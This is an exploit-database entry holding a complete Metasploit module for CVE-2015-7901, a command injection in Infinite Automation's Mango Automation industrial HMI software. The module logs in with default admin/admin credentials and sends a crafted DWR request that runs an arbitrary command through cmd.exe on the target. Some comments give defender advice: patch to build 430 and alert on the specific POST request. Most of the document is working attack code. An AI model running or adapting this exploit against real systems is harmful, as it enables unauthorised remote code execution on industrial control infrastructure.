Infinite Automation / Mango Automation - Command Injection Exploit

2017-10-13
ID: 94477
CVE: None
Download vulnerable application: None
require 'msf/core'
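  # Metasploit auxiliary module for CVE-2015-7901: an authenticated OS command
  # injection through the DWR method EventHandlersDwr.testProcessCommand in
  # Infinite Automation Systems Mango Automation v2.5.0 - 2.6.0 beta (builds
  # prior to 430).
  #
  # Defender notes, all taken from the requests this module sends:
  #   * The vulnerable endpoint is only reachable with a valid web session, so
  #     the defaults this module ships with (admin/admin) are what make it
  #     practical. Rotating credentials and upgrading to build 430 or later
  #     removes the exposure.
  #   * A POST to /dwr/call/plaincall/EventHandlersDwr.testProcessCommand.dwr
  #     whose c0-param0 carries an interpreter invocation (cmd.exe here) is the
  #     request to alert on in Tomcat or reverse-proxy access logs.
  class MetasploitModule < Msf::Auxiliary
    Rank = GreatRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
      super(update_info(info,
        'Name'           => 'Infinite Automation Mango Automation Command Injection',
        'Description'    => %q{
            This module exploits a command injection vulnerability found in Infinite
            Automation Systems Mango Automation v2.5.0 - 2.6.0 beta (builds prior to
            430).
        },
        'Author'         => [ 'james fitts' ],
        'License'        => MSF_LICENSE,
        'References'     =>
          [
            [ 'CVE', '2015-7901' ],
            [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-15-300-02' ]
          ],
        'DisclosureDate' => 'Oct 28 2015'))

      register_options(
        [
          Opt::RPORT(8080),
          OptString.new('TARGETURI', [ false, 'Base path to Mango Automation', '/login.htm']),
          OptString.new('CMD', [ false, 'The OS command to execute', 'calc.exe']),
          OptString.new('USER', [true, 'The username to login with', 'admin']),
          OptString.new('PASS', [true, 'The password to login with', 'admin'])
        ], self.class)
    end

    # Authenticates against the Mango login form and hands back the session
    # cookie the DWR call needs.
    #
    # @param user [String] username posted to the login form
    # @param pass [String] password posted to the login form
    # @return [String] the raw Set-Cookie header value when the login succeeds
    # @return [Symbol] :abort when either request gets no response at all
    # @return [nil] when no session cookie was issued or the credentials were rejected
    def do_login(user, pass)
      uri = normalize_uri(target_uri.path)

      # The initial GET is only there to obtain the session cookie that the
      # login POST has to carry.
      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => uri
      )
      if res.nil?
        vprint_error("#{peer} - Connection timed out")
        return :abort
      end

      cookie = res.headers['Set-Cookie']
      if cookie.nil?
        # Without a cookie there is no session to authenticate, so the POST
        # below could never succeed; report it instead of posting a nil cookie.
        vprint_error("#{peer} - Login page did not set a session cookie")
        return
      end

      print_status("Attempting to login with credentials '#{user}:#{pass}'")
      res = send_request_cgi(
        'method'    => 'POST',
        'uri'       => uri,
        'cookie'    => cookie,
        'vars_post' => {
          'username' => user,
          'password' => pass
        }
      )
      if res.nil?
        vprint_error("#{peer} - Connection timed out")
        return :abort
      end

      # A successful login is a redirect to the data point details page;
      # any other response (including being bounced back to the login page)
      # counts as a failed login.
      location = res.headers['Location']
      if location && location =~ /data_point_details\.shtm/
        print_good("#{peer} - Successful login: '#{user}:#{pass}'")
        cookie
      else
        vprint_error("#{peer} - Bad login: '#{user}:#{pass}'")
        nil
      end
    end

    # Logs in, then submits one DWR batch that calls testProcessCommand with
    # datastore['CMD'] passed through cmd.exe. Only the server's reply is
    # inspected; per the success message, process output goes to the Tomcat
    # console rather than coming back in the response.
    def run
      cookie = do_login(datastore['USER'], datastore['PASS'])

      # do_login returns :abort on a dead connection and nil on a bad login.
      # Neither is a usable session, so stop here rather than raising
      # NoMethodError from cookie.split further down.
      unless cookie.is_a?(String)
        print_error("#{peer} - Login failed, not sending the DWR request")
        return
      end

      # Same shape as the batch the event-handlers page itself submits; the
      # operator-supplied command rides in c0-param0.
      data = [
        "callCount=1",
        "page=%2Fevent_handlers.shtm",
        "httpSessionId=%0D%0A",
        "scriptSessionId=26D579040C1C11D2E21D1E5F321094E5866",
        "c0-scriptName=EventHandlersDwr",
        "c0-methodName=testProcessCommand",
        "c0-id=0",
        "c0-param0=string:c:\\windows\\system32\\cmd.exe /c #{datastore['CMD']}",
        "c0-param1=string:15",
        "batchId=24"
      ].join("&")

      res = send_request_raw({
        'method'  => 'POST',
        'uri'     => normalize_uri("dwr", "call", "plaincall", "EventHandlersDwr.testProcessCommand.dwr"),
        'cookie'  => cookie.split(";").first,
        'ctype'   => "application/x-www-form-urlencoded",
        'headers' => {
          'Origin'                    => 'null',
          'Upgrade-Insecure-Requests' => 1,
          'Connection'                => "keep-alive"
        },
        'data'    => data
      }, 5)

      # send_request_raw yields nil on timeout; res.body would raise otherwise.
      if res.nil?
        print_error("#{peer} - No response from the DWR endpoint")
        return
      end

      if res.body =~ /org\.directwebremoting\.extend\.MarshallException/
        print_error("Something went wrong...")
        # print_line keeps the body on the module's output driver; puts would
        # bypass it (and any log/console redirection).
        print_line(res.body)
      elsif res.body =~ /Check your Tomcat console for process output/
        print_good("Command executed successfully")
      end
    end
  end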